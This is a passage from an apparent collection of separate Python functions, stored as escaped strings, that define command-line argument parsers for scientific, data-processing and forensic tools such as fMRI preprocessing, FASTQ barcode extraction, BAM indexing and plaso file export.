brain)\")\n parser.add_argument(\"-n\", \"--nl_reg\", action=\"store_true\", default=False,\n help=\"use non-linear warp between anatomical and MNI template (default = linear warp)\")\n\n # Required Inputs\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\"-e\", \"--epi\", action=\"store\", required=True,\n help=\"text file of paths to raw epi data\")\n required.add_argument(\"-a\", \"--anat\", action=\"store\", required=True,\n help=\"text file of paths to raw anatomical data\")\n required.add_argument(\"-o\", \"--out_dir\", action=\"store\", required=True, metavar=\"OUT\",\n help=\"text file of paths to output directory\")\n result = parser.parse_args(args)\n\n # Make sure inputted parameters are legal\n assert (os.path.isfile(result.epi)), \"{} does not exist or is not a file\".format(result.epi)\n assert (os.path.isfile(result.anat)), \"{} does not exist or is not a file\".format(result.ant)\n assert (result.trs_remove >= 0), \"Cannot remove negative trs\"\n assert (result.dim_voxel >= 0), \"Cannot have a negative voxel dimension\"\n assert (np.all(np.array(result.bandpass) > 0)), \"Cannot have a negative frequency limit for bandpassing\"\n assert (result.volumes > -1), \"Number of volumes must be greater than 0\"\n assert (result.cores > 0), \"Number of cores used must be greater than 0\"\n assert (result.time_step > -1), \"Time step must be greater than 0\"\n\n return result", "def set_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser( # type: argparse.ArgumentParser\n description=r'''\n -----------------------------------\n < Pull DNA barcodes from FASTQ files >\n -----------------------------------\n /\n \\ ______/ V`-, /\n } /~~\n /_)^ --,r'\n |b |b\n ''',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False\n )\n # Arguments for verbosity and logging\n parser.add_argument( # Verbosity\n '-v',\n '--verbosity',\n dest='verbosity',\n type=str.lower,\n choices=_VERBOSITY_LEVELS,\n default=_VERBOSITY_DEFAULT,\n required=False,\n metavar='verbosity',\n help=\"Set the verbosity level, choose from '%s'; defaults to '%s'\" % (\"', '\".join(_VERBOSITY_LEVELS), _VERBOSITY_DEFAULT)\n )\n parser.add_argument( # Number of cores\n '--parallel',\n dest='num_cores',\n type=_num_cores,\n const=None,\n default=1,\n nargs='?',\n required=False,\n metavar='num jobs',\n help=\"Run %(prog)s in parallel; if passed, can optionally specify the number of jobs to run at once\"\n )\n parser.add_argument( # Output directory\n '-o',\n '--output-directory',\n dest='outdirectory',\n type=str,\n default=_OUTDIR_DEFAULT,\n required=False,\n metavar='output directory',\n help=\"Choose where all output files are to be stored; defaults to '%s'\" % _OUTDIR_DEFAULT\n )\n # Input arguments\n inputs = parser.add_argument_group(\n title='input arguments',\n description='Provide inputs for %(prog)s'\n )\n inputs.add_argument( # Forward FASTQ\n '-f',\n '--forward-fastq',\n dest='forward',\n type=str,\n default=None,\n required=True,\n metavar='FORWARD FASTQ',\n help=\"Provide a filepath for the forward/single FASTQ file\"\n )\n inputs.add_argument( # Reverse FASTQ\n '-r',\n '--reverse-fastq',\n dest='reverse',\n type=str,\n default=None,\n required=False,\n metavar='REVERSE FASTQ',\n help=\"Provide a filepath for the optional reverse FASTQ file\"\n )\n inputs.add_argument( # Sample sheet\n '-s',\n '--sample-sheet',\n dest='sample_sheet',\n type=str,\n default=None,\n required=True,\n metavar='SAMPLE SHEET',\n help=\"Provide a filepath for the sample sheet\"\n )\n inputs.add_argument( # Barcodes file\n '-b',\n '--barcodes',\n dest='barcodes',\n type=str,\n required=True,\n default=None,\n metavar='BARCODES',\n help=\"Provide a filepath for the barcodes CSV file\"\n )\n barcodes = parser.add_argument_group(\n title='barcode options',\n description=\"Set parameters for barcode demultiplexing\"\n )\n barcodes.add_argument( # Number of errors allowed\n '-e',\n '--error',\n dest='error',\n type=int,\n default=_ERROR_DEFAULT,\n required=False,\n metavar='ERROR',\n help=\"This is how many mismatches in the barcode we allowed before rejecting, defaults to %s\" % _ERROR_DEFAULT\n )\n return parser", "def parseArg(self, c):\n\n\t\trocks.app.Application.parseArg(self, c)\n\n\t\tif c[0] in ('--conf', '-c'):\n\t\t\tself.config.setFile(c[1])\n\t\t\tself.config.parse()\n\t\telif c[0] in ('--master',):\n\t\t\tself.masters = [rocks.service411.Master(c[1])]\n\t\telif c[0] in ('--shared',):\n\t\t\tself.shared_filename = c[1]\n\t\telif c[0] in ('--pub',):\n\t\t\tself.pub_filename = c[1]\n\t\telif c[0] == \"--comment\":\n\t\t\tself.comment = c[1]\n\t\telif c[0] == \"--all\":\n\t\t\tself.getall = 1\n\t\telif c[0] in (\"--local\", \"--file\"):\n\t\t\tself.doFile = 1\n\t\telif c[0] in (\"-v\", \"--verbose\"):\n\t\t\tself.verbose += 1", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Normalize the BraTS data set\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n input_options = parser.add_argument_group(\"Input\")\n input_options.add_argument('--brats', required=True, help=\"BraTS root data set directory\")\n input_options.add_argument('--year', required=True, type=int, default=2018, help=\"BraTS year\")\n\n output_options = parser.add_argument_group(\"Output\")\n output_options.add_argument('--output', required=True, help=\"Output directory of normalized data set\")\n\n general_options_group = parser.add_argument_group(\"General\")\n general_options_group.add_argument(\"--pool-size\", type=int, default=8, help=\"Size of worker pool\")\n\n logging_options_group = parser.add_argument_group(\"Logging\")\n logging_options_group.add_argument('--log', dest=\"log_level\", default=\"WARNING\", help=\"Logging level\")\n logging_options_group.add_argument('--log-file', default=\"normalize.log\", help=\"Log file\")\n\n args = parser.parse_args()\n\n # Setup the logger\n global logger\n logger = logging.getLogger('root')\n\n # Logging level configuration\n log_level = getattr(logging, args.log_level.upper())\n if not isinstance(log_level, int):\n raise ValueError('Invalid log level: %s' % args.log_level)\n logger.setLevel(log_level)\n\n log_formatter = logging.Formatter('[%(asctime)s][%(levelname)s][%(funcName)s] - %(message)s')\n\n # For the log file...\n file_handler = logging.FileHandler(args.log_file)\n file_handler.setFormatter(log_formatter)\n logger.addHandler(file_handler)\n\n # For the console\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def parse_args():\n parser = argparser()\n args = parser.parse_args()\n\n # --------------------------------------------------------- #\n # Parse and check runtime parameters.\n # --------------------------------------------------------- #\n\n # check validity of cores selection.\n max_ppn = max_cpu() + 1\n if args.proc_per_node > max_ppn:\n warnings.warn('{0} is greater than the number of available cores ({1}). Reducing to {2}'\n .format(args.proc_per_node, max_ppn, max_ppn - 1))\n args.proc_per_node = max_ppn - 1\n\n # ensure that user has supplied fresh .bam/.bai files or a directory containing alignment files.\n if not args.bam_files and not args.bam_dir:\n raise ValueError('Must specify either --bam-files or --bam-dir.')\n\n if args.bam_files and args.bam_dir:\n raise ValueError('Both --bam-files and --bam-dir were provided! Not sure which data set to use.')\n\n # --------------------------------------------------------- #\n # Gather input RNA-Seq + genome annotation files.\n # --------------------------------------------------------- #\n\n # check validity of gene annotation file selection.\n if not args.genome_annotation:\n raise ValueError('If warm-start directory not specified, gene annotation file must be specified!')\n\n else:\n if not os.path.isfile(args.genome_annotation):\n raise FileNotFoundError('Gene annotation file {0} not found.'.format(args.genome_annotation))\n\n # check validity of file i/o selection.\n bam_files = list()\n bai_files = list()\n create_bai_files = list()\n\n # INPUT OPTION 1: a --bam-dir was specified.\n if args.bam_dir:\n\n # if user used both --bam-dir and --bam-files and/or --bai-files, yell at them. (only use one method).\n if args.bam_files is not None or args.bai_files is not None:\n raise ValueError('Do not specify both a --bam-dir and either --bam-files and/or --bai-files.'\n 'Use one input selection method or the other.')\n\n # check that the dir actually exists.\n if not os.path.isdir(args.bam_dir):\n raise NotADirectoryError('Cannot find --bam-dir {0}'.format(args.bam_dir))\n\n # scan directory for .bam files.\n for f in os.listdir(args.bam_dir):\n if f.endswith('.bam'):\n bam_files.append(os.path.join(args.bam_dir, f))\n\n # search for .bai files in the --bam-dir. If they don't exist, try to make them.\n for bam_file in bam_files:\n bai_file = re.sub('.bam$', '.bai', bam_file)\n\n # if .bai file under same basename as .bam file doesn't exist,\n # add it to list of .bai files that need to be created.\n if not os.path.isfile(bai_file):\n bai_files.append(bai_from_bam_file(bam_file))\n create_bai_files.append(bam_file)\n else:\n bai_files.append(bai_file)\n\n # INPUT OPTION 2: --bam-files and possibly --bai-files were specified.\n else:\n # ensure .bam files are actually .bam files.\n for bam_file in args.bam_files:\n if not bam_file.endswith('.bam'):\n raise ValueError('{0} is not a .bam file.'.format(bam_file))\n elif not os.path.isfile(bam_file):\n raise FileNotFoundError('Count not find .bam file {0}'.format(bam_file))\n else:\n bam_files.append(bam_file)\n\n # case where user has specified .bai files to accompany .bam files.\n if args.bai_files is not None:\n # if user has supplied an incorrect number of bai files, fail out.\n if len(args.bai_files) != len(bam_files):\n raise ValueError('Number of supplied .bai files does not match number of supplied .bam files.')\n\n # ensure .bai files are actually .bai files.\n for bai_file in args.bai_files:\n if not bai_file.endswith('.bai'):\n raise ValueError('{0} is not a .bai file.'.format(bai_file))\n elif not os.path.isfile(bai_file):\n raise FileNotFoundError('Count not find .bai file {0}'.format(bai_file))\n else:\n bai_files.append(bai_file)\n\n # if user has not supplied any bai files: look for them under the same name\n # as each of the .bam files, or create new .bai files with samtools (if possible).\n else:\n for bam_file in bam_files:\n bai_file = re.sub('.bam$', '.bai', bam_file)\n\n # if .bai file under same name as .bam file doesn't exist,\n # add it to list of .bam files for which we need to create a .bai file.\n if not os.path.isfile(bai_file):\n bai_files.append(bai_from_bam_file(bam_file))\n create_bai_files.append(bam_file)\n else:\n bai_files.append(bai_file)\n\n # ensure that input files are uniquely named.\n if len(bam_files) != len(set(bam_files)):\n raise ValueError('Supplied .bam files are not uniquely named!')\n\n # create parser attributes for bam/index files.\n args.bam_files = bam_files\n args.bai_files = bai_files\n args.create_bai_files = create_bai_files\n\n return args", "def parse_command_line_arguments(argv):\n print(\"reading command line arguments in...\")\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-i', '--input', help='Location of input csv file', required=True)\n parser.add_argument('-p', '--predicting', help='The column name containing the category to predict', required=True)\n parser.add_argument('-s', '--scoring', help='The scoring type to be used with model evaluation', required=False)\n parser.add_argument('-c', '--scale', help='List of column names to scale values for', nargs='+', required=False)\n args = parser.parse_args()\n\n return args.input, args.predicting, args.scoring, args.scale", "def parse_args(unparsed_args_list):\n\n IMPORT_HELP = (\"Pipeline to import new genome data into \"\n \"a MySQL database.\")\n DATABASE_HELP = \"Name of the MySQL database to import the genomes.\"\n INPUT_FOLDER_HELP = (\"Path to the folder containing files to be processed.\")\n IMPORT_TABLE_HELP = \"\"\"\n Path to the CSV-formatted table containing\n instructions to process each genome.\n Structure of import ticket table:\n 1. Action to implement on the database (add, remove, replace, update)\n 2. PhageID to add or update\n 3. Host genus of the updated phage\n 4. Cluster of the updated phage\n 5. Subcluster of the updated phage\n 6. Annotation status of the updated phage (draft, final, unknown)\n 7. Annotation authorship of the updated phage (hatfull, gbk)\n 8. Gene description field of the updated phage (product, note, function)\n 9. Accession of the updated phage\n 10. Run mode of the updated phage\n 11. PhageID that will be removed or replaced\")\n \"\"\"\n PROD_RUN_HELP = \\\n (\"Indicates whether the script should make any changes to the database. \"\n \"If True, the production run will implement all changes in the \"\n \"indicated database. If False, the test run will not \"\n \"implement any changes.\")\n\n parser = argparse.ArgumentParser(description=IMPORT_HELP)\n parser.add_argument(\"database\", type=str, help=DATABASE_HELP)\n parser.add_argument(\"input_folder\", type=str, help=INPUT_FOLDER_HELP)\n parser.add_argument(\"import_table\", type=str, help=IMPORT_TABLE_HELP)\n parser.add_argument(\"-p\", \"--prod_run\", action=\"store_true\",\n default=False, help=PROD_RUN_HELP)\n\n # Assumed command line arg structure:\n # python3 -m pdm_utils <pipeline> <additional args...>\n # sys.argv: [0] [1] [2...]\n args = parser.parse_args(unparsed_args_list[2:])\n return args", "def parse_args(self, args: List[str]) -> Namespace:\n parser = self._to_parser()\n args = parser.parse_args(args)\n if hasattr(args, 'dm_commands'):\n if args.dm_commands is not None:\n args.dm_commands = parse_commands(args.dm_commands)\n else:\n args.dm_commands = list()\n if hasattr(args, 'dm_options'):\n if args.dm_options is not None:\n args.dm_options = parse_options(args.dm_options)\n else:\n args.dm_options = dict()\n LOG.debug(f\"Arguments: {args}.\")\n return args", "def parse_args(self, argv=None):\n self.opts, self.args = self.cli_parser.parse_args(argv)\n self.check_arguments()\n self._post_process_opts_and_args()\n return self.opts, self.args", "def parse_arguments():\n\n info = 'Divides pdb info files for parallelization'\n parser = argparse.ArgumentParser(description=info)\n\n # program arguments\n parser.add_argument('-f', '--in-file',\n type=str,\n required=True,\n help='PDB info file to divide')\n parser.add_argument('-n', '--num-splits',\n default=1000,\n type=int,\n help='Number of splits to perform (Default: 1000)')\n parser.add_argument('-m', '--mut-file',\n type=str,\n required=True,\n help='File containing mutation information')\n parser.add_argument('--split-dir',\n default = \"../data/split_pdbs/\",\n type=str,\n help='Output directory for split PDB info files')\n\n args = parser.parse_args()\n opts = vars(args)\n return opts", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='Changes a lammps data file by implementing options such as: '\n 'reorder atom ids in a lammps data file, given a dictionary to '\n 'reorder the atoms (a csv of old_index,new_index), and/or '\n 'change the atom, bond, angle, dihedral, and/or improper types,'\n 'given a dictionary to do so. Can also '\n 'print info for selected atom ids. ')\n parser.add_argument(\"-c\", \"--config\", help=\"The location of the configuration file in ini format.\"\n \"The default file name is {}, located in the \"\n \"base directory where the program as run.\".format(DEF_CFG_FILE),\n default=DEF_CFG_FILE, type=read_cfg)\n args = None\n try:\n args = parser.parse_args(argv)\n except IOError as e:\n warning(\"Problems reading file:\", e)\n parser.print_help()\n return args, IO_ERROR\n except (InvalidDataError, KeyError, MissingSectionHeaderError, SystemExit) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n return args, GOOD_RET", "def parse_args():\n parser = argparse.ArgumentParser(description='database update')\n parser.add_argument('--host', dest='host', help='database host',\n default=\"localhost\")\n parser.add_argument('--database', dest='database', help='database name',\n default='x5gon_dirty')\n parser.add_argument('--user', dest='user', help='database user',\n default=\"postgres\")\n parser.add_argument('--password', dest='password', help='database password',\n default='hayleys')\n parser.add_argument('--procs', dest='procs', help='number of parallel processes',\n default=10)\n parser.add_argument('--out', dest='out', help='output file name',\n default=\"output\")\n parser.add_argument('--tf_conf', dest='tf_conf', help='threshold for TF similarity',\n default=0.85)\n parser.add_argument('--wiki_conf', dest='wiki_conf', help='threshold for WIKI similarity',\n default=0.95)\n arguments = parser.parse_args()\n return arguments", "def parse_args():\n # Define what commandline arguments can be accepted\n parser = argparse.ArgumentParser()\n parser.add_argument(Flags.CSV_DIR,metavar=\"CSV_DIRECTORY\", type=check_str_is_dir,\n help=\"Source directory containing Digikey CSV files\")\n parser.add_argument(Flags.PDF_DIR,metavar=\"PDF_DIRECTORY\", type=check_str_is_dir,\n help=\"Directory to save the PDF datasheets to\")\n parser.add_argument('--csv_pages', dest=Flags.CSV_PAGES,metavar=\"NUM_PAGES\", type=int, default=1,\n help=\"How many 500-row pages to download from Digikey (default 1)\")\n parser.add_argument('--fv_code', dest=Flags.FV_CODE,metavar=\"FV_CODE\", default='ffe002af', #op-amp\n help=\"The FV code of the part family on Digikey (default op-amps)\")\n parser.add_argument('--encrypted', dest=Flags.KEEP_ENCRYPTED, action='store_true', default=False, help=\"Do not filter encrypted PDFs\")\n parser.add_argument('--skip_csv', dest=Flags.SKIP_CSV_DL, action='store_true', default=False, help=\"Do not redownload the CSV.\")\n parser.add_argument('--skip_pdf', dest=Flags.SKIP_PDF_DL, action='store_true', default=False, help=\"Do not redownload the PDFs.\")\n parser.add_argument('--ocr', dest=Flags.KEEP_OCR, action='store_true', default=False, help=\"Do not filter PDFs that need OCR\")\n parser.add_argument('--duplicates', dest=Flags.KEEP_DUPLICATES, action='store_true', default=False, help=\"Do not filter duplicate PDFs (NOT IMPLEMENTED)\")\n parser.add_argument('--version', action='version', version='%(prog)s 0.0.0')\n args = vars(parser.parse_args())\n\n # TODO (lwhsiao): We should also add option to automatically select a parameterized\n # number of files and organize as train/test/dev\n\n Flags.parsed_args = args\n return args", "def parse_arguments(raw_args=sys.argv[1:]):\n parser = optparse.OptionParser(\n usage=\"usage: %prog [OPTIONS] DOMAIN_NAME DOMAIN_CONFIG_FILE\",\n description=\"A tool for provisioning a Khan Academy CloudSearch \"\n \"domain.\")\n\n parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"If specified, DEBUG messages will be printed and more \"\n \"information will be printed with each log message.\")\n\n parser.add_option(\"--leave-temp-dir\", action=\"store_true\", default=False,\n help=\"If specified, the created temporary directory will not be \"\n \"deleted when the script exits.\")\n\n parser.add_option(\"-n\", \"--dry-run\", action=\"store_true\", default=False,\n help=\"If specified, no commands will actually be executed.\")\n\n parser.add_option(\"--no-reindex\", action=\"store_true\", default=False,\n help=\"If specified, will only update the config, without reindexing.\")\n\n options, args = parser.parse_args(raw_args)\n\n if len(args) != 2:\n parser.error(\"You must specify the name of the domain and a file \"\n \"containing the domain configuration.\")\n\n return (options, args[0], args[1])", "def parse_args():\n parser = MyParser(description='Data processing and analytics library \\\n for OpenStack Browbeat perf data')\n\n parser.add_argument('-s', '--summary', dest=\"days\", type=int, default=-1,\n help='-s N summary of last N days of results')\n\n parser.add_argument('--summary-uuid', dest=\"summary_uuid\", type=str,\n default=None,\n help='--summary-uuid UUID summary of a specific uuid')\n\n parser.add_argument('--short-summary', dest=\"short_days\", type=int,\n default=-1,\n help='--short-summary N gives \\\n summary of last N days of results but uses cockroach \\\n db so only provides with basic summary')\n\n parser.add_argument('--upload-timesummary', dest=\"timeseries_uuid\",\n type=str, default=None,\n help='--upload-timesummary UUID \\\n uploads the features computed from data obtained from\\\n graphite. ')\n\n parser.add_argument('--upload-logsummary', dest=\"loggin_uuid\",\n type=str, default=None,\n help='--upload-logsummary UUID \\\n uploads the log summary to crdb \\\n currently just summarizes over entire timeperiod. ')\n\n parser.add_argument('-u', '--update-db', dest='update', type=bool,\n default=False,\n help='-u True pushes data to cockroach db')\n\n parser.add_argument('--update-clf', dest=\"clf_days\", type=int,\n default=-1,\n help='--update-clf 60 will update all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days')\n\n parser.add_argument('--test-clf', dest=\"test_days\", type=int,\n default=-1,\n help='--test-clf 60 will train all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days and then test it \\\n and display metrics')\n\n parser.add_argument('-v', '--osp-version', dest='version', type=str,\n default=None,\n help='-v 11-tripleo only returns hits for that \\\n OpenStack version, \\\n only supported by summary right now')\n\n parser.add_argument('-c', '--config', dest='config', type=str,\n default=pkg_resources.resource_filename('bml',\n \"config.yml\"),\n help='-c <config file path> use custom config file')\n\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Generates performance metrics from a set of Paraver traces.')\n parser.add_argument('trace_list', nargs='*',\n help='list of traces to process in .prv or .h5 format. Accepts wild cards and automaticaly filters for valid traces')\n parser.add_argument('-d', '--debug', help='increases output verbosity to debug level', action='store_true')\n parser.add_argument('-s', '--scaling',\n help='defines whether the measurements are weak or strong scaling (default: auto)',\n choices=['weak', 'strong', 'auto'], default='auto')\n parser.add_argument('-dim', '--dimemas', help='runs Dimemas to get ideal execution times', action='store_true',\n default=False)\n parser.add_argument('-p', '--only_parse', action='store_true', help='only parse the trace_list. This option is provided to control parsing parameters')\n parser.add_argument('--chunk_size', metavar='MB', type=int, default=1024, help='parser option: limits maximum size of the file to hold in memory (default 1GB)')\n parser.add_argument('-c', '--comp_lvl', metavar='LVL', default=0, help='parser option: sets the compression level (between 0 and 9). Default is 0 (no compression)')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n cmdl_args = parser.parse_args()\n\n prv_parser_args['--chunk_size'] = cmdl_args.chunk_size\n prv_parser_args['--comp_lvl'] = cmdl_args.comp_lvl\n if cmdl_args.debug:\n print('==DEBUG== Running in debug mode.')\n prv_parser_args['--verbose'] = True\n\n return cmdl_args", "def add_args(self, parser):", "def ParseArguments():\n\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--db_file_path\", required = False, help = \"SQLite database filename\", type = str, default = '')\n parser.add_argument(\"--server_url\", required = False, help = \"Server's domain name\", type = str, default = '')\n parser.add_argument(\"--substation_name\", required = False, help = \"Substation name\", type = str, default = '')\n parser.add_argument(\"--net_interfaces\", required = False, help = \"List of network interfaces\", type = str)\n parser.add_argument(\"--no_hostname_check\", required = False, help = \"Disable TLS certificate hostname validation (insecure)\", action = 'store_true')\n parser.add_argument(\"--external_interval\", required = False, help = \"Interval (s) between invocations of external commands\", default = '3')\n parser.add_argument(\"--external_timeout\", required = False, help = \"Maximum time (s) an external command is allowed to run\", default = None)\n parser.add_argument(\"--external_command\", required = False, help = \"Periodically invoke given command to gather external data. Use repeatedly.\", action = 'append', default = [])\n parser.add_argument(\"--uuid\", required = False, help = \"To get UUID or hostname (set by default) as an unique ID.\", action = 'store_true')\n\n argv = parser.parse_args(sys.argv[1:])\n\n config_data = {}\n try:\n if os.path.isfile('config.json'):\n json_data_file = open('config.json', 'r')\n config_data = json.load(json_data_file)\n required_keys = ['db_file_path', 'server_url']\n for key in required_keys:\n if key not in config_data:\n print('config.json file does not contain required key %s' % key)\n sys.exit()\n else:\n print('config.json does not exist in the current directory.')\n sys.exit()\n except IOError:\n sys.exit()\n\n config_data['no_hostname_check'] = argv.no_hostname_check or config_data.get('no_hostname_check', False)\n\n interval = float(argv.external_interval)\n\n if argv.external_timeout is None:\n timeout = interval\n else:\n timeout = float(argv.external_timeout)\n\n if timeout > interval:\n print('Error: External command timeout is longer than interval')\n sys.exit()\n\n config_data['external_interval'] = interval\n config_data['external_timeout'] = timeout\n config_data['external_command'] = argv.external_command\n config_data['substation_name'] = argv.substation_name\n config_data['uuid'] = argv.uuid\n\n if argv.db_file_path == '':\n if not config_data['db_file_path']:\n config_data['db_file_path'] = '/var/local/agent_sqlite3.db'\n print('SQLite3 database file is set by default: /var/local/agent_sqlite3.db')\n else:\n config_data['db_file_path'] = argv.db_file_path\n\n ifs = argv.net_interfaces or config_data.get('net_interfaces', [])\n if isinstance(ifs, str):\n ifs = ifs.split(',')\n config_data['net_interfaces'] = utils.interfaces_to_ip(ifs)\n\n # TODO verify provided URL\n if argv.server_url == '':\n if not config_data['server_url']:\n print('Please, provide server URL as an argument or in config.json file.')\n print('It must be in this format: wss://<domain_name>:443/agent')\n sys.exit()\n else:\n config_data['server_url'] = argv.server_url\n\n\n return config_data", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n parser.add_argument('--debug', dest='debug', default=False, action='store_true', help='set to debug mode ')\n parser.add_argument('--num_train_sentence', dest='num_train_sentence', type=int, default=-1,\n help='set number of sentence to train on')\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n parser.add_argument('--attn_model', type=str, default='general', help='Attention model to use: general (default), dot, concat')\n\n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def handle_arguments():\n # process the command options\n parser = argparse.ArgumentParser()\n parser.add_argument('images', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\images.npy\"')\n parser.add_argument('labels', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\labels.csv\"')\n parser.add_argument('-t', '--test_ratio', type=float, default=0.2,\n help='proportion of data for testing, default: 0.2')\n parser.add_argument('-s', '--seed', type=int, default=None, help='seed '\n 'used for consistent data splitting, default: None')\n parser.add_argument('-a', '--data_augmentation', action='store_true',\n help='switch to augment the images')\n drop_info_fns = ['cutout', 'gridmask', 'None'] # info dropping algorithms\n parser.add_argument('-d', '--drop_info_fn', type=str, choices=drop_info_fns,\n default=None, help='whether cutout, GridMask, or no '\n 'information dropping algorithm is used, default: None')\n parser.add_argument('-c', '--class_balancing', action='store_true',\n help='switch to perform class balancing')\n parser.add_argument('-b', '--batch_size', type=int, default=32,\n help='batch size of DataLoader objects, default: 32')\n parser.add_argument('-l', '--label_smoothing', action='store_true',\n help='switch to use soft targets in loss computation')\n parser.add_argument('-e', '--epochs', type=int, default=50, help='number '\n 'of iterations over training data, default: 50')\n parser.add_argument('-m', '--model', type=str, default='model.pt',\n help='path to save trained model, default: \"model.pt\"')\n\n # parse and print arguments\n args = parser.parse_args()\n for arg in vars(args):\n print(f'{arg.upper()}: {getattr(args, arg)}')\n\n return args", "def parse_args(self):\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--data', dest='data',\n help='Generate requested amount of test data.',\n type=int, nargs='+')\n parser.add_argument('-c', '--check', action='store_true',\n dest='check', help='Check files without modifying them.',\n default=False)\n args = parser.parse_args()\n self.arg_data = args.data\n self.arg_check = args.check\n\n if xc.arg_data: # did the user request to generate test data?\n choice = input(Fore.YELLOW + 'This option will ' + Fore.RED +\n '*OVERWRITE ALL FILES* ' + Fore.YELLOW + 'you sure (y/n)? ')\n if choice.upper() == 'Y':\n self.test_data_row_count = int(self.arg_data[0])\n xc.generate_test_data()\n else:\n xc.arg_data = False\n else:\n self.process_dump_files()", "def parse_arguments():\n p = argparse.ArgumentParser(description='Prepare the dataset for use by neural models.')\n p.add_argument(\"json_file\", type=argparse.FileType('r'), help=\"json file with all the data\")\n p.add_argument(\"prefix\", type=str, help=\"prefix for all the generated files\")\n p.add_argument(\"data_type\", type=str, choices=[\"names\", \"comments\", \"nc\"],\n default=\"nc\", help=\"type of the information recorded in the dataset\")\n p.add_argument(\"labels\", type=str, choices=[\"PROG\", \"ALL\", \"TOP\"],\n default=\"PROG\", help=\"method by which to choose the labels for the dataset\")\n p.add_argument(\"-other_label\", type=str, required=False, default=\"\",\n help=\"label to use instead of all infrequent labels. \"\n \"This can be left blank to ignore infrequent labels altogether\")\n p.add_argument(\"-label_num\", type=int, default=100, required=False,\n help=\"Number of most frequent labels to keep. Works with label_choice=TOP\")\n p.add_argument(\"-min_prog_labels\", type=int, default=5, required=False,\n help=\"Minimal number of programs a label has to appear in for it to be included \"\n \"in the dataset. Works with label_choice=PROG\")\n p.add_argument(\"-test_prog_list\", type=argparse.FileType('r'), default=None, required=False,\n help=\"file with the list of programs in the test set (optional)\")\n\n return p.parse_args(sys.argv[1:])", "def _ParseCommandArguments():\n arg_parser = argparse.ArgumentParser()\n arg_parser.usage = __doc__\n\n arg_parser.add_argument('--download-dir',\n type=str,\n required=True,\n help='Directory into which corpora are downloaded.')\n arg_parser.add_argument('--build-dir',\n required=True,\n type=str,\n help='Directory where fuzzers were built.')\n args = arg_parser.parse_args()\n return args", "def ParseArguments(self):\n self._ConfigureLogging()\n\n argument_parser = argparse.ArgumentParser(\n description=self.DESCRIPTION, epilog=self.EPILOG, add_help=False,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n self.AddBasicOptions(argument_parser)\n self.AddInformationalOptions(argument_parser)\n\n names = [u'artifact_definitions', u'data_location']\n helpers_manager.ArgumentHelperManager.AddCommandLineArguments(\n argument_parser, names=names)\n\n self.AddLogFileOptions(argument_parser)\n\n self.AddStorageMediaImageOptions(argument_parser)\n self.AddVSSProcessingOptions(argument_parser)\n\n self.AddFilterOptions(argument_parser)\n\n argument_parser.add_argument(\n u'-w', u'--write', action=u'store', dest=u'path', type=str,\n metavar=u'PATH', default=u'export', help=(\n u'The directory in which extracted files should be stored.'))\n\n argument_parser.add_argument(\n u'--include_duplicates', dest=u'include_duplicates',\n action=u'store_true', default=False, help=(\n u'If extraction from VSS is enabled, by default a digest hash '\n u'is calculated for each file. These hashes are compared to the '\n u'previously exported files and duplicates are skipped. Use '\n u'this option to include duplicate files in the export.'))\n\n argument_parser.add_argument(\n self._SOURCE_OPTION, nargs='?', action=u'store', metavar=u'IMAGE',\n default=None, type=str, help=(\n u'The full path to the image file that we are about to extract '\n u'files from, it should be a raw image or another image that '\n u'plaso supports.'))\n\n try:\n options = argument_parser.parse_args()\n except UnicodeEncodeError:\n # If we get here we are attempting to print help in a non-Unicode\n # terminal.\n self._output_writer.Write(u'')\n self._output_writer.Write(argument_parser.format_help())\n return False\n\n try:\n self.ParseOptions(options)\n except errors.BadConfigOption as exception:\n self._output_writer.Write(u'ERROR: {0!s}\\n'.format(exception))\n self._output_writer.Write(u'')\n self._output_writer.Write(argument_parser.format_usage())\n return False\n\n return True", "def 